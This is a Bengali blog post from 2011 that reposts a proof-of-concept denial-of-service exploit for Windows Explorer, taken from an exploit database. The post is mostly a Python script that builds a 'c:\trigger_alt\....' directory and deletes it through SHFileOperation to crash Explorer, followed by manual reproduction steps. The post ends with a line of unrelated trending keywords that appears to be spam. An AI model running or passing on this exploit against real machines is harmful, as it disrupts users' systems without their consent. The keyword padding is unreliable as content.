রবিবার, ২৫ ডিসেম্বর, ২০১১

[dos / poc] - Windows Explorer Denial Of Service

Windows Explorer Denial Of Service | Inj3ct0r - exploit database : vulnerability : 0day : shellcode
# Windows 2008 SP2 RC2 Explorer Go Byebye :P
 # Windows 7 Pro SP1 Explorer Go Byebye :P
 # Interesting
 # Brought to you by Level & z0r0 @ Smash The Stack
  
 from win32com.shell import shell, shellcon
 from os import mkdir
  
 try:
     mkdir("c:\\trigger_alt")
 except:
     print "[!] Trigger Directory Exists"
 try:
     mkdir("c:\\trigger_alt\\....")
 except:
     print "[!] Trigger Sub Directory Exists"
  
 print "[!] Triggering Issue"
  
 # This moves the directory containing the sub directory which creates the condition.
 # The issue is in the function that moves the files to the recycle bin
 # Replicate this using the following
 # 1- mkdir c:\trigger_alt
 # 2- cd c:\trigger_alt
 # 3- mkdir ....\
 # 4- My Computer -> c:\trigger_alt
 # 5- Right Click -> Delete
  
 shell.SHFileOperation((0,shellcon.FO_DELETE,'c:\\trigger_alt',None,shellcon.FOF_ALLOWUNDO|shellcon.FOF_NOCONFIRMATION))
 
  # 1337day.com [2011-12-24]

Source: http://www.1337day.com/exploits/17303

dina manzo once upon a time once upon a time sharia law sharia law demarco murray ed reed

কোন মন্তব্য নেই:

একটি মন্তব্য পোস্ট করুন